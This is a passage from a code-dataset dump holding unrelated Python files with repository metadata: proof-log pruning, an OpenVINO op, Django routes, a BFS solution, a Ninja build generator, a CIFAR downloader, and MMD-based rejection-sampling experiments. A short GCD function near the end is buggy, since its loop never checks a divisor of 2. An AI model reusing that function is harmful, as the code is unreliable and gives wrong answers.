[subgoal.index for subgoal in subgoals]))
for subgoal in subgoals:
if not subgoal.processed:
subgoal.processed = True
to_process.append(subgoal)
return reasons, [node.index for node in to_process if node is not None]
def _keep_tac_app(node: deephol_pb2.ProofNode, i: int) -> deephol_pb2.ProofNode:
"""Keep only one tactic application with the given index in the node.
Args:
node: The node for which the tactic_applications list is to be reduced.
i: Index of the tactic application.
Returns:
A new node with a single tactic_application.
"""
tac_app = deephol_pb2.TacticApplication()
tac_app.CopyFrom(node.proofs[i])
del node.proofs[:]
node.proofs.add().CopyFrom(tac_app)
return node
def extract_proof(proof_log: deephol_pb2.ProofLog
) -> Optional[deephol_pb2.ProofLog]:
"""Reduce the proof into a simply checkable format.
The utility of this function is to prune the proof to an acyclic
sub-hypergraph, so that the proof argument is trivial to check.
All the nodes in this acyclic hypergraph are proved and correspond to
the proof of the root node of the proof log. The nodes are ordered
from the higherst level targets, that means each goals precede their
subgoals in the list of nodes.
Args:
proof_log: The proof_log that needs to be reduced.
Returns:
A new ProofLog with a mimimal proof necessary to prove all closed
Theorem nodes.
"""
if not proof_log.nodes:
return proof_log
result = find_reasons(proof_log)
if result is None:
return None
(reasons, _) = result
new_log = deephol_pb2.ProofLog(
error_message=proof_log.error_message,
num_proofs=proof_log.num_proofs,
prover_options=proof_log.prover_options,
time_spent=proof_log.time_spent,
theorem_in_database=proof_log.theorem_in_database)
new_log.nodes.extend([
_keep_tac_app(proof_log.nodes[node_index], tac_app_index)
for node_index, tac_app_index, _ in reasons
])
return new_log
| 36.291513 | 80 | 0.696289 | 1,459 | 9,835 | 4.583276 | 0.211789 | 0.022731 | 0.008973 | 0.010767 | 0.092418 | 0.053537 | 0.043368 | 0.043368 | 0.043368 | 0.030806 | 0 | 0.003049 | 0.233045 | 9,835 | 270 | 81 | 36.425926 | 0.883468 | 0.439451 | 0 | 0.136986 | 0 | 0 | 0.0529 | 0 | 0 | 0 | 0 | 0 | 0.020548 | 1 | 0.061644 | false | 0 | 0.047945 | 0 | 0.219178 | 0.006849 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e88b5dae837f606fb166948f31a188865997d6fc | 815 | py | Python | tools/mo/openvino/tools/mo/ops/proposal_python_example.py | pazamelin/openvino | b7e8ef910d7ed8e52326d14dc6fd53b71d16ed48 | [
"Apache-2.0"
] | 1 | 2019-09-22T01:05:07.000Z | 2019-09-22T01:05:07.000Z | tools/mo/openvino/tools/mo/ops/proposal_python_example.py | pazamelin/openvino | b7e8ef910d7ed8e52326d14dc6fd53b71d16ed48 | [
"Apache-2.0"
] | 58 | 2020-11-06T12:13:45.000Z | 2022-03-28T13:20:11.000Z | tools/mo/openvino/tools/mo/ops/proposal_python_example.py | pazamelin/openvino | b7e8ef910d7ed8e52326d14dc6fd53b71d16ed48 | [
"Apache-2.0"
] | 2 | 2019-09-20T01:33:37.000Z | 2019-09-20T08:42:11.000Z | # Copyright (C) 2018-2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
from openvino.tools.mo.ops.proposal import ProposalOp
from openvino.tools.mo.front.caffe.extractor import register_caffe_python_extractor
from openvino.tools.mo.graph.graph import Graph
from openvino.tools.mo.ops.op import Op
class ProposalPythonExampleOp(Op):
op = 'Proposal'
def __init__(self, graph: Graph, attrs: dict):
mandatory_props = {
'type': __class__.op,
'op': __class__.op,
'post_nms_topn': 300,
'infer': ProposalOp.proposal_infer
}
super().__init__(graph, mandatory_props, attrs)
register_caffe_python_extractor(ProposalPythonExampleOp, 'rpn.proposal_layer.ProposalLayer.example')
Op.excluded_classes.append(ProposalPythonExampleOp)
| 31.346154 | 100 | 0.728834 | 97 | 815 | 5.824742 | 0.515464 | 0.084956 | 0.120354 | 0.134513 | 0.077876 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019288 | 0.173006 | 815 | 25 | 101 | 32.6 | 0.818991 | 0.094479 | 0 | 0 | 0 | 0 | 0.097959 | 0.054422 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.25 | 0 | 0.4375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e88d0771051f1b7a1e367489b942cfbfcad70bbd | 1,021 | py | Python | jemmys/main/urls.py | IanMinash/jemmys | 00dba405ebc4aec8361cdb10972a615f2f6eb295 | [
"MIT"
] | null | null | null | jemmys/main/urls.py | IanMinash/jemmys | 00dba405ebc4aec8361cdb10972a615f2f6eb295 | [
"MIT"
] | null | null | null | jemmys/main/urls.py | IanMinash/jemmys | 00dba405ebc4aec8361cdb10972a615f2f6eb295 | [
"MIT"
] | null | null | null | from django.urls import path, include
from django.conf.urls.static import static
from django.conf import settings
from .views import home, contact, ProductDetailView, categories, cart_manager, cart, variants, make_order, view_order, order_search, shipping, set_session
urlpatterns = [
path('', home, name='home'),
path('view/<slug:slug>', ProductDetailView.as_view(), name='view-product'),
path('contact', contact, name='contact'),
path('shipping', shipping, name='shipping'),
path('cats', categories, name='cats'),
path('cart', cart, name='cart'),
path('order/', include([
path('', make_order, name='make-order'),
path('search', order_search, name='search-order'),
path('<order_id>', view_order, name='view-order'),
])),
path('cart-manager', cart_manager, name='cart-manager'),
path('variant-info', variants, name='variant-info'),
path('set-session', set_session, name='set-session'),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| 46.409091 | 154 | 0.685602 | 129 | 1,021 | 5.310078 | 0.286822 | 0.064234 | 0.040876 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.140059 | 1,021 | 21 | 155 | 48.619048 | 0.780182 | 0 | 0 | 0 | 0 | 0 | 0.197845 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e88d20e30b514eb8551e2ff365c75bb86b2f4e87 | 1,374 | py | Python | src/data/576.py | NULLCT/LOMC | 79a16474a8f21310e0fb47e536d527dd5dc6d655 | [
"MIT"
] | null | null | null | src/data/576.py | NULLCT/LOMC | 79a16474a8f21310e0fb47e536d527dd5dc6d655 | [
"MIT"
] | null | null | null | src/data/576.py | NULLCT/LOMC | 79a16474a8f21310e0fb47e536d527dd5dc6d655 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
from itertools import accumulate, chain, combinations, groupby, permutations, product
from collections import deque, Counter
from bisect import bisect_left, bisect_right
from math import gcd, sqrt, sin, cos, tan, degrees, radians, ceil, floor
from fractions import Fraction
from decimal import Decimal
import sys
n, q = map(int, input().split())
g = [[] for _ in range(n)] # 隣接リスト
#rstripが必要なことも
#input = lambda: sys.stdin.readline().rstrip()
#inputの高速化、基本はいらん、入力が長いときに使用
#from sys import setrecursionlimit
#setrecursionlimit(10**7)
def bfs(u):
queue = deque([u])
d = [None] * n # uからの距離の初期化
d[u] = 0 # 自分との距離は0
while queue:
v = queue.popleft()
for i in g[v]:
if d[i] is None:
d[i] = d[v] + 1
queue.append(i)
return d
MOD = 10**9 + 7
INF = float('inf')
#float型の無限大inf
def resolve():
#n=int(input())
for _ in range(n - 1):
a, b = [int(x) for x in input().split()]
g[a - 1].append(b - 1)
g[b - 1].append(a - 1)
#C = list(map(int, input().split()))
#C.sort()
#d=bfs(1)
#print(d)
d = bfs(0)
for i in range(q):
c, doo = map(int, input().split())
if (d[c - 1] - d[doo - 1]) % 2 == 1:
print("Road")
else:
print("Town")
if __name__ == "__main__":
resolve()
| 22.9 | 85 | 0.567686 | 199 | 1,374 | 3.859296 | 0.467337 | 0.041667 | 0.042969 | 0.0625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0222 | 0.278748 | 1,374 | 59 | 86 | 23.288136 | 0.752775 | 0.200146 | 0 | 0 | 0 | 0 | 0.017528 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | false | 0 | 0.194444 | 0 | 0.277778 | 0.055556 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e88f5b61276e4ae9d0a3a820fc7e3d37e0dd276b | 2,565 | py | Python | AppEngine/make_ninja.py | nicenboim/oplop | bc73e179ff9b628cdffa44284ca3e2d9820a04bf | [
"Apache-2.0"
] | null | null | null | AppEngine/make_ninja.py | nicenboim/oplop | bc73e179ff9b628cdffa44284ca3e2d9820a04bf | [
"Apache-2.0"
] | null | null | null | AppEngine/make_ninja.py | nicenboim/oplop | bc73e179ff9b628cdffa44284ca3e2d9820a04bf | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python2.7
from __future__ import absolute_import, print_function
import os
import re
import yaml
MAKE_NINJA_SCRIPT = __file__
MAKE_MANIFEST_SCRIPT = 'make_manifest.py'
MANIFEST_FILENAME = 'cache.manifest'
NINJA_TEMPLATE = """
rule make_ninja
generator = {make_ninja_script}
command = python2.7 {make_ninja_script}
build build.ninja: make_ninja | {make_ninja_script} app.yaml
rule make_manifest
command = python2.7 make_manifest.py --output $out $in
build {cache_manifest_filename}: make_manifest {served} | {make_manifest_script} app.yaml
default {cache_manifest_filename}
"""
def in_static_dir(filepath, static_dirs):
"""See if filepath is contained within a directory contained in
static_dirs."""
for directory in static_dirs:
if filepath.startswith(directory):
return True
else:
return False
if __name__ == '__main__':
with open('app.yaml') as file:
gae_config = yaml.load(file)
skip_re = re.compile('|'.join('({})'.format(regex)
for regex in gae_config['skip_files']))
static_files = set()
static_dirs = set()
for handler in gae_config['handlers']:
if 'secure' not in handler or handler['secure'] != 'always':
RuntimeError('handler rule for {!r} does not force SSL'.format(
handler['url']))
if 'static_files' in handler:
static_files.add(handler['static_files'])
elif 'static_dir' in handler:
static_dirs.add(handler['static_dir'])
skipped = set()
served = set()
cwd = os.getcwd()
for dirpath, dirnames, filenames in os.walk(cwd):
for filename in filenames:
filepath = os.path.join(dirpath, filename)[len(cwd)+len(os.sep):]
if skip_re.match(filepath):
skipped.add(filepath)
elif filepath in static_files or in_static_dir(filepath, static_dirs):
served.add(filepath)
else:
raise RuntimeError('{!r} is not handled'.format(filepath))
print('Skipped:')
for path in sorted(skipped):
print(' ', path)
# Cache manifest cannot depend on itself.
try:
served.remove(MANIFEST_FILENAME)
except KeyError:
pass
with open('build.ninja', 'w') as file:
file.write(NINJA_TEMPLATE.format(make_ninja_script=MAKE_NINJA_SCRIPT,
make_manifest_script=MAKE_MANIFEST_SCRIPT,
cache_manifest_filename=MANIFEST_FILENAME,
served=' '.join(served)))
| 29.482759 | 89 | 0.646394 | 318 | 2,565 | 4.968553 | 0.330189 | 0.04557 | 0.056962 | 0.027848 | 0.074684 | 0.036709 | 0 | 0 | 0 | 0 | 0 | 0.003114 | 0.248733 | 2,565 | 86 | 90 | 29.825581 | 0.816814 | 0.053411 | 0 | 0.032258 | 0 | 0 | 0.237898 | 0.030203 | 0 | 0 | 0 | 0 | 0 | 1 | 0.016129 | false | 0.016129 | 0.064516 | 0 | 0.112903 | 0.048387 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e88fb1838f6ff177723daf69814346373304e3e7 | 813 | py | Python | newtend_service.py | openprocurement/robot_tests.broker.newtend | 5b111585eaa1aecf255478ccb45fa3a631499a4c | [
"Apache-2.0"
] | null | null | null | newtend_service.py | openprocurement/robot_tests.broker.newtend | 5b111585eaa1aecf255478ccb45fa3a631499a4c | [
"Apache-2.0"
] | 13 | 2016-09-13T12:54:35.000Z | 2017-12-10T10:02:09.000Z | newtend_service.py | openprocurement/robot_tests.broker.newtend | 5b111585eaa1aecf255478ccb45fa3a631499a4c | [
"Apache-2.0"
] | 8 | 2016-04-07T13:10:13.000Z | 2019-11-28T16:30:53.000Z | from datetime import datetime
from iso8601 import parse_date
from op_robot_tests.tests_files.service_keywords import get_now
from calendar import monthrange
def newtend_date_picker_index(isodate):
now = get_now()
date_str = '01' + str(now.month) + str(now.year)
first_day_of_month = datetime.strptime(date_str, "%d%m%Y")
mod = first_day_of_month.isoweekday() - 2
iso_dt = parse_date(isodate)
# last_day_of_month = monthrange(now.year, now.month)[1]
# LOGGER.log_message(Message("last_day_of_month: {}".format(last_day_of_month), "INFO"))
if now.day > iso_dt.day:
mod = monthrange(now.year, now.month)[1] + mod
return mod + iso_dt.day
def update_data_for_newtend(tender_data):
tender_data.data.procuringEntity['name'] = u"openprocurement"
return tender_data
| 35.347826 | 92 | 0.734317 | 125 | 813 | 4.472 | 0.432 | 0.044723 | 0.089445 | 0.075134 | 0.093023 | 0.093023 | 0 | 0 | 0 | 0 | 0 | 0.0131 | 0.154982 | 813 | 22 | 93 | 36.954545 | 0.800582 | 0.173432 | 0 | 0 | 0 | 0 | 0.040359 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.25 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8925628c7941abc45dfbee01462286b7a002051 | 1,096 | py | Python | cifar/download.py | messiest/cifar-image-classifier | a2efe26a69143f21dce78bbc015611a3cf6feb60 | [
"BSD-3-Clause"
] | null | null | null | cifar/download.py | messiest/cifar-image-classifier | a2efe26a69143f21dce78bbc015611a3cf6feb60 | [
"BSD-3-Clause"
] | null | null | null | cifar/download.py | messiest/cifar-image-classifier | a2efe26a69143f21dce78bbc015611a3cf6feb60 | [
"BSD-3-Clause"
] | null | null | null | import os
from torchvision.datasets.cifar import CIFAR10, CIFAR100
IMG_DIR = './data'
def download10():
"""download cifar100 dataset"""
if not os.path.exists(IMG_DIR):
os.mkdir(IMG_DIR)
cifar = CIFAR10(root=IMG_DIR, download=True)
assert(bool(cifar))
print("download complete")
def download100():
"""download cifar100 dataset"""
if not os.path.exists(IMG_DIR):
os.mkdir(IMG_DIR)
cifar = CIFAR100(root=IMG_DIR, download=True)
return cifar
class Downloader:
def __init__(self, dataset=10, n=1, download=False):
"""these values belong to an instance of the class"""
print("downloading CIFAR-{} data...".format(dataset))
self.name = "CIFAR{}".format(dataset)
if download:
self.download = {
'CIFAR10': download10(),
'CIFAR100': download100(),
}
def __repr__(self):
"""has to return a string"""
return self.name
def main():
# if dataset == '10'
dl = Downloader(100)
if __name__ == "__main__":
main()
| 22.367347 | 61 | 0.594891 | 128 | 1,096 | 4.914063 | 0.421875 | 0.066773 | 0.073132 | 0.079491 | 0.27345 | 0.203498 | 0.203498 | 0.203498 | 0.203498 | 0.203498 | 0 | 0.048934 | 0.27281 | 1,096 | 48 | 62 | 22.833333 | 0.740276 | 0.129562 | 0 | 0.137931 | 0 | 0 | 0.086817 | 0 | 0 | 0 | 0 | 0 | 0.034483 | 1 | 0.172414 | false | 0 | 0.068966 | 0 | 0.344828 | 0.068966 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8929f4e65fd5b5e13e3dc2fc143aa36dc7768d1 | 894 | py | Python | edge_detection_function/tensorflow_layer.py | chiang9/Edge_detection | bd1797f1be31dbd7cc90ead5ed0972865576a7c8 | [
"MIT"
] | 2 | 2020-08-10T14:00:04.000Z | 2021-01-18T08:44:21.000Z | edge_detection_function/tensorflow_layer.py | chiang9/Edge_detection | bd1797f1be31dbd7cc90ead5ed0972865576a7c8 | [
"MIT"
] | null | null | null | edge_detection_function/tensorflow_layer.py | chiang9/Edge_detection | bd1797f1be31dbd7cc90ead5ed0972865576a7c8 | [
"MIT"
] | null | null | null | class CropLayer(object):
def __init__(self, params, blobs):
self.xstart = 0
self.xend = 0
self.ystart = 0
self.yend = 0
# Our layer receives two inputs. We need to crop the first input blob
# to match a shape of the second one (keeping batch size and number of channels)
def getMemoryShapes(self, inputs):
inputShape, targetShape = inputs[0], inputs[1]
batchSize, numChannels = inputShape[0], inputShape[1]
height, width = targetShape[2], targetShape[3]
self.ystart = (inputShape[2] - targetShape[2]) // 2
self.xstart = (inputShape[3] - targetShape[3]) // 2
self.yend = self.ystart + height
self.xend = self.xstart + width
return [[batchSize, numChannels, height, width]]
def forward(self, inputs):
return [inputs[0][:,:,self.ystart:self.yend,self.xstart:self.xend]] | 38.869565 | 84 | 0.629754 | 114 | 894 | 4.903509 | 0.438596 | 0.071556 | 0.039356 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025487 | 0.253915 | 894 | 23 | 85 | 38.869565 | 0.812594 | 0.163311 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.176471 | false | 0 | 0 | 0.058824 | 0.352941 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e893a4fe398ce90ad4805fac1e87712018fa446c | 9,409 | py | Python | rejection_sampling.py | psteinb/HINT | 8d5c3421fa898776eaa11a61bf0e3cb8b44de1ab | [
"MIT"
] | null | null | null | rejection_sampling.py | psteinb/HINT | 8d5c3421fa898776eaa11a61bf0e3cb8b44de1ab | [
"MIT"
] | null | null | null | rejection_sampling.py | psteinb/HINT | 8d5c3421fa898776eaa11a61bf0e3cb8b44de1ab | [
"MIT"
] | null | null | null | import numpy as np
import torch
import time
import os
import matplotlib.pyplot as plt
import pickle
from tqdm import tqdm
from scipy.spatial import distance_matrix
from data import FourierCurveModel
# Choose data set
dataset = ('fourier_curve', 'fourier-curve')
# dataset = ('plus_shape', 'plus-shape')
# Choose number of run (3 to 5 training runs were used to calculate error statistics)
run = 0
# Uncomment to import and prepare saved models
conditional_models = {}
# for name in ['conditional_cinn_1', 'conditional_cinn_2', 'conditional_cinn_4', 'conditional_cinn_8', 'conditional_hint_1_full', 'conditional_hint_2_full', 'conditional_hint_4_full', 'conditional_hint_8_full']:
# exec("import configs." + dataset[0] + "." + name + " as " + name)
# exec(name + ".model.load_state_dict(torch.load(f'output/{run}/{" + name + ".c.suffix}.pt')['net'])")
# exec("conditional_models[" + name + ".c.suffix] = {'model': " + name + ".model, 'inverse': " + name + ".model_inverse}")
unconditional_models = {}
# for name in ['unconditional_inn_1', 'unconditional_inn_2', 'unconditional_hint_1_full', 'unconditional_hint_2_full']:
# exec("import configs." + dataset[0] + "." + name + " as " + name)
# exec(name + ".model.load_state_dict(torch.load(f'output/{run}/{" + name + ".c.suffix}.pt')['net'])")
# exec("unconditional_models[" + name + ".c.suffix] = {'model': " + name + ".model, 'inverse': " + name + ".model_inverse}")
def multi_mmd(x, y, widths_exponents=[(0.5, 1), (0.2, 1), (0.2, 0.5)]):
# def multi_mmd(x, y, widths_exponents=[(1, 0.5), (0.2, 0.8), (0.2, 0.4)]):
xx, yy, xy = torch.mm(x,x.t()), torch.mm(y,y.t()), torch.mm(x,y.t())
rx = xx.diag().unsqueeze(0).expand_as(xx)
ry = yy.diag().unsqueeze(0).expand_as(yy)
dxx = torch.clamp(rx.t() + rx - 2.*xx, 0, np.inf)
dyy = torch.clamp(ry.t() + ry - 2.*yy, 0, np.inf)
dxy = torch.clamp(rx.t() + ry - 2.*xy, 0, np.inf)
XX = torch.zeros(xx.shape).cuda()
YY = torch.zeros(xx.shape).cuda()
XY = torch.zeros(xx.shape).cuda()
for C, a in widths_exponents:
XX += C**a * ((C + dxx) / a)**-a
YY += C**a * ((C + dyy) / a)**-a
XY += C**a * ((C + dxy) / a)**-a
return torch.mean(XX + YY - 2.*XY)
def prepare_samples(model, N=int(1e8)):
print(f'Drawing {N:,} samples from "{model.name}" prior...', end=' ')
t = time.time()
x, y, = [], []
for i in tqdm(range(int(N/1e4))):
x.append(model.sample_prior(int(1e4)).astype(np.float32))
y.append(model.forward_process(x[-1]).astype(np.float32))
np.save(f'abc/{model.name}_x_huge', np.concatenate(x, axis=0))
np.save(f'abc/{model.name}_y_huge', np.concatenate(y, axis=0))
print(f'Done in {time.time()-t:.1f} seconds.')
def quantile_ABC(x, y, y_target, n=4000):
print(f'Evaluating ABC to obtain {n:,} samples closest to {y_target[0]} from set of {len(y):,}...', end=' ')
t = time.time()
d = distance_matrix(y_target, y)[0]
sort = np.argsort(d)[1:]
sample = x[sort][:n]
threshold = d[sort[n]]
print(f'Done in {time.time()-t:.1f} seconds, tolerance is {threshold:.3f}.')
return sample, threshold
def mean_target_distance(model, y_target, x):
y = model.forward_process(x.cpu().numpy())[:,2:]
dist = torch.sum((torch.FloatTensor(y) - y_target[0].cpu())**2, dim=1).sqrt()
return dist.mean()
def compare_unconditional(data_model, n_runs=100, sample_size=4000):
# Load data
x = np.load(f'abc/{data_model.name}_x_huge.npy')
# Prepare lists
for model in unconditional_models.values():
model['samples'] = []
model['times'] = []
model['mmds'] = []
# Perform runs
for i in range(n_runs):
print(f'\nRun {i+1:04}/{n_runs:04}:')
# Ground truth sample and shared latent sample for all models
gt_sample = torch.tensor(x[np.random.choice(x.shape[0], sample_size, replace=False)], device='cuda')
z_sample = torch.cuda.FloatTensor(sample_size, data_model.n_parameters).normal_()
# Generate samples from all models
with torch.no_grad():
for name, model in unconditional_models.items():
t = time.time()
sample = model['inverse'](z_sample)
model['times'].append(time.time() - t)
model['samples'].append(sample)
model['mmds'].append(multi_mmd(sample, gt_sample).item())
print(f"{name+':':48} {model['mmds'][-1]:.5f} ({model['times'][-1]:.3f}s)")
# Print averaged results
print('\nAverage over all runs:')
for name, model in unconditional_models.items():
print(f"{name+':':45} {np.mean(model['mmds']):.5f} ({np.mean(model['times']):.3f}s)")
# Save results for later plotting
dump = {name: {'times': model['times'], 'mmds': model['mmds']} for (name, model) in unconditional_models.items()}
with open(f'abc/{data_model.name}_unconditional_comparison_{run}.pkl', 'wb') as f:
pickle.dump(dump, f)
def compare_conditional(data_model, n_runs=1000, sample_size=4000):
# Load data
x, y = np.load(f'abc/{data_model.name}_x_huge.npy'), np.load(f'abc/{data_model.name}_y_huge.npy')
# Prepare lists
for model in conditional_models.values():
model['samples'] = []
model['times'] = []
model['mmds'] = []
model['dists'] = []
# Perform runs
for i in range(n_runs):
# Rejection sample to compare against
try:
with open(f'abc/{data_model.name}/{i:05}.pkl', 'rb') as f:
y_target, gt_sample, threshold = pickle.load(f)
assert gt_sample.shape[0] >= sample_size
except:
if not os.path.exists(f'abc/{data_model.name}'):
os.mkdir(f'abc/{data_model.name}')
y_target = data_model.forward_process(data_model.sample_prior(1)).astype(np.float32)
gt_sample, threshold = quantile_ABC(x, y, y_target, n=sample_size)
with open(f'abc/{data_model.name}/{i:05}.pkl', 'wb') as f:
pickle.dump((y_target, gt_sample, threshold), f)
print(f'\nRun {i+1:04}/{n_runs:04} | y = {np.round(y_target[0], 3)}:')
gt_sample = torch.from_numpy(gt_sample).cuda()
# Shared latent sample and target observation for all models
z_sample = torch.cuda.FloatTensor(sample_size, data_model.n_parameters).normal_()
y_target = torch.tensor(y_target).expand(sample_size, data_model.n_observations).cuda()
# Generate samples from all models
with torch.no_grad():
for name, model in conditional_models.items():
t = time.time()
sample = model['inverse'](y_target, z_sample)
model['times'].append(time.time() - t)
model['samples'].append(sample)
model['mmds'].append(multi_mmd(sample, gt_sample).item())
model['dists'].append(mean_target_distance(data_model, y_target, sample).item())
print(f"{name+':':46} {model['mmds'][-1]:.5f} {model['dists'][-1]:.5f} ({model['times'][-1]:.3f}s)")
# Print averaged results
print('\nAverage over all runs:')
for name, model in conditional_models.items():
print(f"{name+':':45} {np.mean(model['mmds']):.5f} {np.mean(model['dists']):.5f} ({np.mean(model['times']):.3f}s)")
# Save results for later plotting
dump = {name: {'times': model['times'], 'mmds': model['mmds'], 'dists': model['dists']} for (name, model) in conditional_models.items()}
with open(f'abc/{data_model.name}_conditional_comparison_{run}.pkl', 'wb') as f:
pickle.dump(dump, f)
def accumulate_metrics_unconditional():
mmds = {'fourier-curve_unconditional_inn-1':[], 'fourier-curve_unconditional_inn-2':[], 'fourier-curve_unconditional_hint-1-full':[], 'fourier-curve_unconditional_hint-2-full':[]}
for i in range(5):
with open(f'abc/fourier-curve_unconditional_comparison_{i+1}.pkl', 'rb') as f:
d = pickle.load(f)
for name, model in d.items():
# print(name, np.mean(model['mmds']), np.std(model['mmds']))
mmds[name].append(np.mean(model['mmds']))
for name in mmds.keys():
print(name)
print(np.mean(mmds[name]))
print(np.std(mmds[name]))
print()
def accumulate_metrics_conditional():
mmds = {'fourier-curve_conditional_cinn-1':[], 'fourier-curve_conditional_cinn-2':[], 'fourier-curve_conditional_cinn-4':[], 'fourier-curve_conditional_cinn-8':[], 'fourier-curve_conditional_hint-1-full':[], 'fourier-curve_conditional_hint-2-full':[], 'fourier-curve_conditional_hint-4-full':[], 'fourier-curve_conditional_hint-8-full':[]}
for i in range(3):
with open(f'abc/fourier-curve_conditional_comparison_{i+1}.pkl', 'rb') as f:
d = pickle.load(f)
for name, model in d.items():
# print(name, np.mean(model['mmds']), np.std(model['mmds']))
mmds[name].append(np.mean(model['mmds']))
for name in mmds.keys():
print(name)
print(f'{np.nanmean(mmds[name]):.4f} \pm {np.nanstd(mmds[name]):.4f}')
print()
if __name__ == '__main__':
pass
prepare_samples(FourierCurveModel())
# compare_conditional(FourierCurveModel())
# accumulate_metrics_conditional()
# compare_unconditional(FourierCurveModel())
# accumulate_metrics_unconditional()
| 46.349754 | 343 | 0.61675 | 1,344 | 9,409 | 4.164435 | 0.162202 | 0.027336 | 0.012864 | 0.020904 | 0.515276 | 0.444345 | 0.414686 | 0.366089 | 0.327497 | 0.296409 | 0 | 0.02009 | 0.20119 | 9,409 | 202 | 344 | 46.579208 | 0.724588 | 0.197896 | 0 | 0.302158 | 0 | 0.05036 | 0.248802 | 0.166534 | 0 | 0 | 0 | 0 | 0.007194 | 1 | 0.057554 | false | 0.007194 | 0.064748 | 0 | 0.143885 | 0.136691 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e894776f624d458e4e3df53378bd8c2742eeaf87 | 260 | py | Python | GCD/3.py | suraj588/DSA-in-Python | 2fe4b47b07050dcae031a0d5d070692655b2932a | [
"MIT"
] | null | null | null | GCD/3.py | suraj588/DSA-in-Python | 2fe4b47b07050dcae031a0d5d070692655b2932a | [
"MIT"
] | null | null | null | GCD/3.py | suraj588/DSA-in-Python | 2fe4b47b07050dcae031a0d5d070692655b2932a | [
"MIT"
] | null | null | null | # Constraint: m, n should be positive
def gcd(m,n):
flag = 1 # setting 1 as default value of gcd
for i in range(min(m,n), 2, -1):
if (m % i == 0) and (n % i == 0):
print(i)
return i
print(flag)
return flag
| 23.636364 | 75 | 0.496154 | 44 | 260 | 2.931818 | 0.590909 | 0.046512 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.037037 | 0.376923 | 260 | 10 | 76 | 26 | 0.759259 | 0.265385 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0 | 0 | 0.375 | 0.25 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8954f13b549078ebde97028074ebe54e8181316 | 3,457 | py | Python | scripts/05_modules/volume/volumetools_meshtovolume_volumetomesh_r20.py | mgoldshteyn/cinema4d_py_sdk_extended | b6c67f1dbae182c09ccbcc1df51f0e7ea4816074 | [
"Apache-2.0"
